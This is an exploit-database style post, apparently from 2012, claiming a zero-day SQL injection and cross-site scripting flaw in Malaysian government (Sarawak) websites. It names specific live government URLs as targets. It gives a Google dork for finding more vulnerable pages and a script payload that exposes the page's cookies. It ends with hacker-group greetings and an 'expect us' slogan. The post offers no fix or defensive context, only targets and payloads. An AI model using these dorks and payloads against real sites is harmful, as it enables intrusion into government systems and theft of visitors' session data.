- Use it at your risk,,,
- Made In Indonesia
---------------------------------------------------------------------------!
# Exploit Title: Ministry Malaysia XSS and SQL Injection Vulnerability
# Date: June 15 . 2012
# Author: phiA
---------------------------------------------------------------------------!
#E-mail :
phia0343s@hackermail.com# Category: [webapps] 0day
#Vendor : Ministry Malaysia [owner site]
---------------------------------------------------------------------------!
# Google dork: inurl:/modules/web/page_print.php?id=
#Security risk : Critical
# Tested on: BackTrack 5
---------------------------------------------------------------------------!
#1 Proof OF Concept SQL Injection Vulnerability
a sample from google dork !
http://www.kktpk.sarawak.gov.my/modules/web/page_print.php?id=[sqli]#2 Proof Of Concept of XSS Vulnerability
a sample from google dork !
http://www.midcom.sarawak.gov.my/modules/web/page.php?id='"<script>alert(document.cookie)</script>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Thankz to : Indonesian Grey Hat Team, Jakarta Anonymous Club , BlackNewbie Team , Depe , Arai Maulana , n0Xtra , Vicky_cyber , RadityaHN , X-Cisadane , Sany Morphic , all Indonesian Hackers.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Quote:
-Indonesian people here !
-You should have eXpect us !